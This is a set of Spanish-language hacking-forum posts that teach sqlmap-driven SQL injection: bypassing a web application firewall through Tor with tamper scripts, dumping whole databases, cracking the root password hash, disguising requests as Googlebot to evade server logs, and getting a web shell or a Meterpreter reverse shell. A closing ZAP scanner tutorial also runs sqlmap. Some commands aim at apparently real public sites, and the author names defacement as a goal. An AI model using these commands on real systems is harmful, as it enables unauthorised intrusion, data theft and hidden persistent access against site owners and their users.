Burlando WAF mediante SQL inyección


En esta oportunidad escogí un servidor web como conejillo de indias para poder llevar acabo el servicio de ataque, en mi caso haré una inyección en el parámetro GET  vulnerable con los comandos básicos de sqlmap con el TOR.

[/code]
Código: text
sqlmap -u http://www.ejemplopaginaweb.com/galeria.php?categoria=2 --tor --check-tor --tor-port=9150 --tor-type=SOCKS5 --level=5 --risk=3 --random-agent




Si bien es cierto el testeo nos arroja que es "Inyectable", luego para nuestra mala suerte nos arroja que es un falso positivo, pero concatena sintaxis, en el parámetro categoría



Entonces al ejecutar el servidor de un falso positivo,me pide que ejecute el "--no-cast"para cargar los payload para el testeo de los nombres de las base se datos, muchos ya se hubieran rendido porque este proceso en su mayoría no es tan útil al momento de extraer las tablas o columnas de la base de datos.

Entonces observando que el servidor esta en MySQL puedo añadir el tamper space2comment, pero también puedo jugar con otro tamper añadiéndolo al testeo como charencode.

Código: text
root@kali:~# sqlmap -u http://www.ejemplopaginaweb.com/galeria.php?categoria=2 --tor --tor-port=9150 --tor-type=SOCKS5 --tamper="space2comment,charencode.py" --level=5 --risk=3 -v 3 --random-agent --dbs --no-cast 




vemos que nuestro testeo esta corriendo y vemos aviso del WAF, ya que hemos personalizado el TEST con un escaneo mas extenso gracias al servicio Verbose que le añadimos el rango 3,  -v 3 enviamos una petición carácter y numérica, entonces nuestro payload se esta ejecutando con perfección



Hemos burlado el WAF y por ende extraído las base de datos de dicho servidor, mientras hay otros tamper que son detectados por los corta fuegos, dándonos como mensaje lo siguiente:



es por eso que se deben interactuar con cada tamper para que trate de bypassear los diferentes tipos de WAF, para poder ejecutar las sentencias de ofuscación, recuerden que cada Tamper esta elaborad para cada tipo de estructura de lenguaje web, como jsp, asp, aspx, php.



Compatibilidad de los tamper con los tipos de estructuras de base de  datos:


MySQL


space2randomblank,
unionalltounion
unmagicquotes
versionedkeywords
versionedmorekeywords
xforwardedforbetween
bluecoat
charencode
charunicodeencode
concat2concatws
equaltolike
greatest
halfversionedmorekeywords
ifnull2ifisnull
space2morehash
space2mysqldash
space2plus
modsecurityversioned
modsecurityzeroversioned
multiplespaces
securesphere
space2comment
space2hash
nonrecursivereplacement
percentage
randomcase

MSSQL:
sp_password
space2comment
space2dash
space2mssqlblank
space2mysqldash
space2plus
space2randomblank
charencode
charunicodeencode
equaltolike
greatest
unionalltounion
unmagicquotes
multiplespaces
nonrecursivereplacement
percentage
randomcase
securesphere

MSAccess:
modsecurityversioned
modsecurityzeroversioned
equaltolike
greatest
halfversionedmorekeywords
nonrecursivereplacement
percentage
randomcase
securesphere
between
bluecoat
charencode
charunicodeencode
concat2concatws
space2comment
space2hash
space2morehash
space2mysqldash
space2plus
space2randomblank
unionalltounion
unmagicquotes
versionedkeywords
versionedmorekeywords
ifnull2ifisnull
multiplespaces

PostgreSQL:
xforwardedfor
space2comment
space2plus
space2randomblank
between
charencode
charunicodeencode
equaltolike
greatest
multiplespaces
nonrecursivereplacement
percentage
randomcase
securesphere
between


SQLite:
space2plus
unionalltounion
unmagicquotes
xforwardedfor
ifnull2ifisnull
randomcase
securesphere
space2comment
space2dashmmultiplespaces
nonrecursivereplacement
#79
Pentesting / Aprendiendo SQLMAP avanzado
Mayo 23, 2016, 10:55:49 AM


Saludos tíos en esta oportunidad vamos a aprender sobre la herramienta Sqlmap en su entorno Inicial y el avanzado
¿Que es el SQLMAP ?

El sqlmap es una herramienta en código abierto, la cual nos permite inyectar  una web automáticamente,y nos permite utilizar varias variables en sus ejecuciones de comandos.
Nuestros Primeros Pasos en el SQLMAP

Utilizare el Sistema Operativo Backtrack R3 /Linux.

Abriremos Nuestra Terminal y pondremos lo siguiente para entrar al directorio.

Código: text
cd /pentest/database/sqlmap


Lo que haremos ahora sera ejecutar el primer nivel de testeo del sqlmap en este caso el nivel 1, pondremos la url con el error de SQL  en este caso un parámetro GET

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


agregaremos una comilla al final  o adelante del numero, la cual nos  confirmara si es vulnerable a una sql inyección  botando el siguiente mensaje :

" You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '9'' at line 1 "

Como vemos esta es una forma de identificar dicho error para inyectarlo, buenos vayamos al grano  8)

Ejecutamos este código en la terminal :

Código: text
./sqlmap.py -u http://192.168.48.1/test/SQL%20Injection/detalle.php?id=9 --dbs


Una ves ejecutado el código, el sqlmap empezara a  Testear la web, una ves terminada  saldrán las base de datos que tenga la misma como vemos en la imagen.



Para Entrar a las base de datos y ver sus tablas pondremos el siguiente codigo

Código: text
./sqlmap.py -u http://192.168.48.1/test/SQL%20Injection/detalle.php?id=9 --D privacidaddb --tables 


Como vemos eh entrado a la base de datos "Privacidaddb"  nos voto las tablas y entre ellas columnas que tienen la información primordial de la web.



Ahora entraremos a la Tabla " usuarios " y  extraeremos todos los datos de un porrazo

Código: text
./sqlmap.py -u http://192.168.48.1/test/SQL%20Injection/detalle.php?id=9 --D privacidaddb -t usuarios --columns --dump




Esta es la manera típica de obtener datos paso por paso

Si deseamos tener todos los datos de las base de datos / tablas columnas y datos de la misma, pondremos  este codigo

Código: text
./sqlmap.py -u http://192.168.48.1/test/SQL%20Injection/detalle.php?id=9 --dump-all 




pero si deseamos tener la base de datos de la web relacionada a las conexiones de la misma base de datos afectaba pondremos el código

Código: text
./sqlmap.py -u http://192.168.48.1/test/SQL%20Injection/detalle.php?id=9 -p id --current-db 




También es muy importante Proteger nuestra privacidad y sobre todo camuflar nuestra Inyección en los Logs del servidor alojado de la web, ya que cada ves que entramos a una web, se quedan grabados nuestras navegaciones, como nuestra IP / y sobre todo el tipo de conexión y petición que usamos , veremos un ejemplo para que se den cuenta.

Como vemos aqui me eh conectado mediante Internet explore  de una maquina virtual mediante el parametro GET :



Ahora me conectare nuevamente asiendo una Inyección SQL para ver como se ve la conexión  :



Como vemos en la imagen " nos dice que la conexión se inicio mediante : "sqlmap/1.0-dev-25eca9d (No tienes permitido ver los links. Registrarse o Entrar a mi cuenta)" como vimos detecta hasta el programa que  utilizamos, pero ojo lo que hize fue algo simple ya que solo utilice el codigo del sqlmap.py  -u url --dbs -D , ahora utilizare el código para dumpear las columnas de las tablas:



como vemos nos detecta de una manera mas textual la conexión que estamos relacionado, entonces el web master se daría cuenta que estamos inyectando su web, entonces vamos a camuflar nuestras conexiones

Pondremos este código :

Código: text
./sqlmap.py -u http://192.168.48.1/test/SQL%20Injection/detalle.php?id=9 -D privacidaddb --tables --user-agent="Mozilla 5 (compatible , Googlebot/2.1, http://www.google.com/bot.html)"




Como vemos hemos camuflado nuestra conexión con un robot  de google la cual esta en todo momento vigente en las conecciones de inicio , y hemos puesto el inicio de origen en este caso " No tienes permitido ver los links. Registrarse o Entrar a mi cuenta"

Luego de ello, vamos a utilizar un metodo de como obtener datos del usuario de la web :

Código: text
sqlmap.py -u http://192.168.48.1/test/SQL%20Injection/detalle.php?id=9  --current-user 




en este otro método vamos a comprobar si el usuario obtenido es correcto al de la base de datos.

Código: text
./sqlmap.py -u http://192.168.48.1/test/SQL%20Injection/detalle.php?id=9 --is-dba --current-db




Debemos tener en cuenta que también podemos ver los privilegios de administradores por medio de este tipo de inyección, pondremos el siguiente código :

Código: text
./sqlmap.py -u http://192.168.48.1/test/SQL%20Injection/detalle.php?id=9 --privileges




Como vimos obtuvimos datos de los privilegios activados .

ahora aprenderemos el mismo metodo, pero en esta ves obtendremos todos los usuarios de DBS mediante este comando:

Código: text
./sqlmap.py -u http://192.168.48.1/test/SQL%20Injection/detalle.php?id=9 --users




como vemos esta alojado como en el sistema como ROOT y corre en un Gnu/Linux ahora viene lo interesante , Obtener las contraseñas de los usuarios de las dbs, utilizaremos este comando

Código: text
./sqlmap.py -u ./sqlmap.py -u http://192.168.48.1/test/SQL%20Injection/detalle.php?id=9 --password




Como vemos nos sale este mensaje, pero porque ?, porque las contraseñas de los registros en las base de datos, automáticamente de codifican en "Hash" como son el "MD5" , que es la codificación mas conocida, bueno esta alerta " si deseamos poner ["Y" , "N", "Q"] , la Letra "Y" nos quiere decir que si deseamos utilizar un ataque de fuerza Bruta mediante el sqlmap, para descifrar la hash , el  " N " , Sirve para negar el proceso de fuerza bruta y obtener solamente la "hash" y el comando " Q " nos permite terminar el proceso hasta ese momento , Yo Pondre la Opcion "Q" y saldra 3 opciones yo , escogere el diccionario 1 /defauld y en momentos votara lo siguiente:



Como vimos nos muestra la contraseña ya crackeada la cual fue " comandos " y también al usuario que lo pertenece que es " root "

También debemos tener en cuenta que podemos utilizar un tipo de búsqueda mas completa y rápida, con la opción búsqueda, la cual nos facilitara el proceso de búsqueda, como " login " o " usuario / "contraseña" o "password ", en este proceso debemos tener en cuenta que debemos jugar con los nombres de búsquedas,para hallar las columnas aun mas rápido, pondremos este comando :

Código: text
./sqlmap.py -u http://localhost/test/SQL%20Injection/detalle.php?id=9 -C login --search 




como vemos nos sale dos opciones  la primera  "Defauld" nos permite tener una lista opcional de la búsqueda
la segunda opción, " nos permite tener una lista mas completa , entonces yo le dare " la primera opción " 1 y nos saldrá las columnas de las base de datos en general :



automáticamente después no saldrá esta opción que veremos en la imagen:



este proceso nos permitirá hacer un dump de las columnas  halladas en las DBS , entonces yo le pondré la opción : "a" que nos hará un dump en  general, y nos votara así:




si deseas tener un proxy en su testeo con el slqmap  , utilizaremos el " tor " primero debemos instalarlo en nuestro sistema operativo, una ves instalado  y configurado utilizaremos este comando .

Código: text
./sqlmap.py -u http://192.168.48.1/test/SQL%20Injection/detalle.php?id=9 --dbs --tor 



Yo solamente pongo el tor porque para mi es uno de los mas seguros, claro si sabes configurar bien el valida con el tor.

Herramientas del Sqlmap

Actualmente hemos utilizado el slqmap para obtener datos de una web, y para ser sinceros hemos obtenido los datos del  administrador , o simplemente no hemos obtenido datos, ya sea por un error en el testeo, o simplemente porque no había los datos de logeo , la cual necesitamos para nuestro " Deface " o para tener el  acceso general a la web entonces nos hemos rendido ante esos pequeños problemas  ahora dime te preguntaras sqlmap tendrá herramientas que me permitan otro tipo de proceso para subir archivos ? pues yo te diré que si esta es una herramienta poderosa que nos permite hacerlo vayamos a la acción tio  8)

Entramos al sqlmap y pondremos el siguiente código

Código: text
./sqlmap.py -u http://192.168.48.1/test/SQL%20Injection/detalle.php?id=9 --os-shell 




Como vemos en la imagen, nos muestra 4 tipos de extensiones web's en este caso, nosotros escogeremos el numero 3  ,porque nuestro upload estará basado el dicha programación, ya que es estándar en los servidores web , yo eligire el php y nuego de ello le damos enter y pondremos el discloure parch  ! yo puse el del inicio de la web, como vemos aqui, luego de ello nos voto! abajo 2 URL" donde nos indicia que el upload subio correctamente.



Entraremos al primer link:



tango down! pasamos a Subir nuestra shell y tenemos acceso total al sistema

Utilizar slqmap con Metasploit , mediante este proceso crearemos  un exploit  pasar a utilizar los payloads como  " Reverse_tcp" para  tener una sesión   reversa, subiendo nuestros "archivos infectados al servidor web" vamos a la acción ! Pondremos el siguiente codigo :

Código: text
./sqlmap.py -u http://192.168.48.1/test/SQL%20Injection/detalle.php?id=9 --os-pwn


Una ves ejecutado nos saldrá esta opción.



Ejecutaremos el primero , ya que vamos a utilizar una conexion de taza  transferencia de protocolos / TCP , con metasploit luego nos saldra las mismas opciones las cuales ejecutamos en la sección de arriba ,como subir un upload por sqlmap, usaremos el mismo procedimiento hasta que les salga estas opciones:



en esta sección no pide crear una shellcode para utilizar la conexión y nos arroja 5 opciones , entonces yo escogeré la opción " 2 " la cual es "Reverse_tcp" , con los  puertos por defecto  " entonces son saldrán 2 opciones y le daremos " Enter " una ves ello nos dirá:



Entonces le  pondré " 1 " ya que capturaremos las sesión meterpreter  y empezara el proceso ...........
luego de ello nos saldrá que ah sido creado nuestra sesión con el ejecutable



Luego de ello se abrirá  automáticamente el metasploit ejecutando los procesos de explotación y automáticamente iniciara la sesión



Como vemos hemos explotado la web , alojada en un servidor windows y tenemos el acceso total interesante . . . . . . . .
Bueno tíos esto fue todo, espero hallan aprendido estos códigos y formas de explotación  mediante el sqlmap , hasta la próxima
#80


Saludos hermanos de underc0de en esta oportunidad les traigo la herramienta llamada "Zaproxy" (Zed Attack Proxy), esta programada en Java la cual el año 2013 gano el top de la mejor herramienta de auditorias difundida por la grande organización de seguridad a nivel mundial OWASP.
Algunos la han llamado la hermana menor de BurpSuite : )

En esta oportunidad haré este POST en Windows, antes de aclarar zaproxy se encuentra en Kali Linux para los que deseen probarla.


Características:

Interceptacion Proxy 
Spiders tradicionales y AJAX
Escáner automatizado
Escáner pasivo
Navegación forzada
Fuzzer
Certificados SSL dinámicos
Soporte de tarjetas inteligentes y certificados digitales de clientes
Apoyo tomas Web
Soporte para una amplia gama de lenguajes de script
Plug-n-Hack apoyo
El soporte de autenticación y la sesión
Potente API basada en REST
Opción Automático actualización
Integrado y creciente mercado de los complementos


DESCARGA:
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


La instalación la vamos a omitir porque es demasiado fácil, por ende cualquiera puede hacerlo sin ningún problema, deben tener Java instalado en su equipo para poder correr la herramienta.

Interactuando con la plataforma:


como vemos la estructura es muy detallada y va de la mano con las personas que son nuevas en experimentar la herramienta, que de por si es demasiada sencilla para todos.
como observamos en una pequeña pantalla donde nos da un mensaje de bienvenida a la herramienta nos aparece el formulario "URL a atacar", con la cual añadiremos nuestro servidor para hacer la prueba de auditoria.


Es demasiado sencillo como se los explique al momento de añadir la url le darán en atacar y automáticamente empezara el escaneo primario con el "Spider", el capturar de módulos y archivos.


Algo bueno del primer escaneo es que nos dará la lista en general del servidor con la cual nosotros mismos podemos analizar y obtener datos que quizás un escaner no pueda capturar porque a todos nos a pasado en algunas de nuestras auditorias.

Pasaremos al segundo escaneo, la cual es 100% ofensivo porque ejecutara payloads en todos los parámetros para comprobar  si son vulnerables y empezara a capturarlos en la pestaña "Alertas", cabe aclarar que el escaneo se ejecuta automáticamente cuando termina por si solo es escaneo primario de igual manera si lo cancelas.


Como bien lo dije hace momentos este segundo escaneo activo, lo que hace es añadir payloads en cada sector del servidor web en busca de un análisis positivo con un vector de ataque que lo confirmara si es vulnerable o no, con la cual nuestros resultados se irán generando en la sesión "Alertas". la cual se van a definir en una lista por categorías de Errores, en mi caso el primero en la lista son los conocidos XSS



Ahora encontramos algo mas que un simple escaneo, la cual al darle 2 clicks a nuestro enlace vulnerable en la sesión de las alertas nos parecen la ventada con la información detallada de dicha vulnerabilidad con su respectivo payload probado, de igual manera pueden añadir el suyo sin ningún problema pero haré esta prueba con el payload que ofrece zaproxy para comprobar su eficacia.


Comprobando el payload en mi caso lo haré con el navegador Mantra


Nuestro objetivo es vulnerable a un XSS, pero vamos a ver las otras vulnerabilidades que hemos encontrado, como la vulnerabilidad de  inyección SQL


De igual manera vamos a comprobar la vulnerabilidad en el navegador

Código: text
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1' ORDER BY sort' at line 1SELECT * FROM biblioteca WHERE id='17'' AND estado='1'  ORDER BY sort 


Código: text
sqlmap.py -u http://www.ejemplodepagina.com.pe/portal/index.php?id=17 --tamper="space2comment,charencode.py" -v 3 --random-agent --dbs --timeout=10 --no-cast


En mi caso tuve que utilizar tamper para que mi objetivo sea testeado sin ser bloqueado por el Firewall, si deseas aprender como bypassearlo lo invito al siguiente POST:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

de igual manera podemos interactuar con las demás listas.


Pero bueno espero les haya gustado el articulo, agradecer no cuesta nada.
Saludos!